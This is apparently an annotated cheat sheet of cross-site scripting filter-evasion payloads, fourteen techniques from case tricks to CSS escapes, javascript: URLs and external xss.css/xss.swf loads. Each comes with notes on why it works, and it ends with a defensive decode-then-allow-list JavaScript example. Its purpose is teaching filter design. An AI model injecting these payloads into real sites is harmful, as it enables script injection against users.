1. Change the case of characters

<sCript>alert('d')</scRipT>

HTML tag and attribute names are case-insensitive, so a filter that only looks for lowercase <script> never sees this one.
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

The `>` inside a quoted attribute value ends the tag as far as a regex such as `<script[^>]*>` is concerned, while the browser's tokenizer keeps reading to the closing quote and still finds SRC. Two of these forms rely on legacy IE parsing: a current HTML5 tokenizer treats `=">"` as an attribute named `="` and ends the tag at the `>`, and it does not treat backticks as quotes, so `a=`>`` also ends the tag at the `>`.
3. Use an extension other than .js

<script src="bad.jpg"></script>

The browser ignores the file extension; whatever the server returns for that URL is executed as script (unless the response carries a non-script Content-Type together with X-Content-Type-Options: nosniff, which blocks it).
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}

Only old browsers executed javascript: URLs inside CSS url(); current browsers do not.
5. Put other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

Between attributes the HTML tokenizer treats `/` like whitespace, so a filter that requires a space after `script` misses both forms.
6. Use tabs or newlines to evade

<img src="jav[TAB]ascr[TAB]ipt:alert('XSS3')">

<img src="jav[LF]ascr[LF]ipt:alert('XSS3')">

<IMG SRC="jav[TAB]ascript:alert('XSS');">

[TAB] and [LF] stand for a literal tab and newline character inside the attribute value. The browser's URL parser removes ASCII tab, LF and CR anywhere in the input before it reads the scheme, so it still sees javascript:, while a filter matching the literal word does not.
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

In CSS a backslash before a non-hex character is an escape for that character, and /* */ comments are dropped by the tokenizer, so expre\ssi\on and expr/*anyword*/ession both reach the engine as expression. expression() itself is an IE-only feature.
8. Use hex encoding to evade (the trailing ";" can also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

CSS accepts \HH hex escapes for any character and HTML attribute values accept &#xHH; character references (the semicolon is optional in both), so every letter of expression or javascript can be written encoded; the browser decodes them before the value is interpreted.
9. Script in HTML tag attributes (event handlers)

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

This list is IE-era and incomplete; newer handlers exist. Any attribute whose name begins with "on" is an event handler, so allow-list the attributes you accept rather than black-listing names from this list.
10. A .swf file containing the XSS code

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

AllowScriptAccess="always" let the Flash movie call into the page's JavaScript. Flash support has been removed from browsers, so this vector is historical.
11. Split the XSS code with CDATA sections and let the data island reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

The XML parser joins the CDATA pieces (or drops the comment) before the SPAN renders the field as HTML, so the filter never sees the word javascript in one piece. XML data islands (DATASRC/DATAFLD) are IE-only.
12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>

The markup in the `to` attribute is entity-encoded, as it must be inside a double-quoted attribute; the t:set behavior decodes it and assigns it to innerHTML. HTML+TIME is an IE-only feature.
13. Write a cookie through META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

Browsers no longer honour Set-Cookie via http-equiv (the HTML standard requires it to be ignored), so this only affected old IE.
14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

Current browsers run javascript: URLs only where a navigation happens (a href, iframe/frame src, form action, location); the img, table and CSS url() forms worked in old IE and Netscape. DYNSRC and LOWSRC are IE-specific attributes. Whatever the sink, check the scheme after the same decoding the browser does (entities, then whitespace stripping), and allow-list it instead of searching for the string "javascript".
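The following is an added example, not code from the original post. It implements the three decoding steps a browser applies to the payloads in items 6, 7, 8 and 14 before a value reaches the URL or CSS engine, then applies a scheme allow-list after those steps, which is the order a filter has to use. The inputs are the post's payloads (the tab/newline ones also written as numeric character references, which is how they are usually delivered); `ALLOWED_SCHEMES`, the minimal entity decoder (numeric references only) and the url() extraction regex are this example's own simplifications.

```javascript
// Added example: decode the way the browser does, then check the scheme.

// 1. Numeric character references in attribute values (&#x09; &#9;, the
//    semicolon is optional). Out-of-range code points are left as-is.
function decodeNumericEntities(s) {
  return s.replace(/&#x([0-9a-f]+);?|&#([0-9]+);?/gi, (m, hex, dec) => {
    const cp = hex ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp > 0x10ffff ? m : String.fromCodePoint(cp);
  });
}

// 2. URL parsing (WHATWG URL spec input preprocessing): ASCII tab/LF/CR are
//    removed anywhere, leading/trailing C0 controls and spaces are trimmed,
//    then the scheme is read case-insensitively. null means a relative URL.
function urlScheme(raw) {
  const s = raw.replace(/[\t\n\r]/g, '').replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// Allow-list the scheme instead of black-listing the word "javascript".
// (Assumed policy for this example.)
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeUrl(attrValue) {
  const scheme = urlScheme(decodeNumericEntities(attrValue));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// 3. CSS tokenization: /* */ comments disappear; "\" + 1-6 hex digits
//    (+ one optional whitespace) is a code point; "\" + any other character
//    is that character. So expre\ssi\on, expr/*x*/ession and
//    \65\78\70\72\65\73\73\69\6F\6E all tokenize to "expression".
function decodeCss(s) {
  return s
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/\\([0-9a-f]{1,6})[ \t\n\r\f]?|\\([^\n\r\f])/gi, (m, hex, ch) => {
      if (!hex) return ch;
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    });
}

// Reject a style value that, once decoded, contains IE's expression() or a
// url() whose scheme is not allowed. The url() extraction is a simplified
// regex for this example, not a full CSS parser.
function cssIsDangerous(styleValue) {
  const d = decodeCss(styleValue);
  if (/expression\s*\(/i.test(d)) return true;
  const m = /url\(\s*(["']?)([\s\S]*?)\1\s*\)/i.exec(d);
  return m ? !isSafeUrl(m[2]) : false;
}

// Constructed inputs: the post's payload values for src / style attributes.
const URL_SAMPLES = [
  "jav\tascr\nipt:alert('XSS3')",      // item 6, literal tab and newline
  'jav&#x09;ascript:alert(1)',         // item 6, tab as a character reference
  ' JaVaScRiPt:alert(1)',              // items 1 and 14
  'https://example.com/',
  '/relative/path',
];
const CSS_SAMPLES = [
  "width: expre\\ssi\\on(alert('XSS31'));",        // item 7
  "xss:expr/*anyword*/ession(alert('sss'))",        // item 7
  "background-image: url(javascript:alert('XSS30'))", // item 14
  'background-image: url(https://example.com/a.png)',
];

for (const u of URL_SAMPLES) {
  console.log(JSON.stringify(u), '-> scheme', urlScheme(decodeNumericEntities(u)),
    isSafeUrl(u) ? 'allowed' : 'rejected');
}
for (const c of CSS_SAMPLES) {
  console.log(JSON.stringify(c), '->', JSON.stringify(decodeCss(c)),
    cssIsDangerous(c) ? 'rejected' : 'allowed');
}
```

The point is the order: a check that runs before entity decoding, whitespace removal and CSS unescaping is matching against a string the browser will never see.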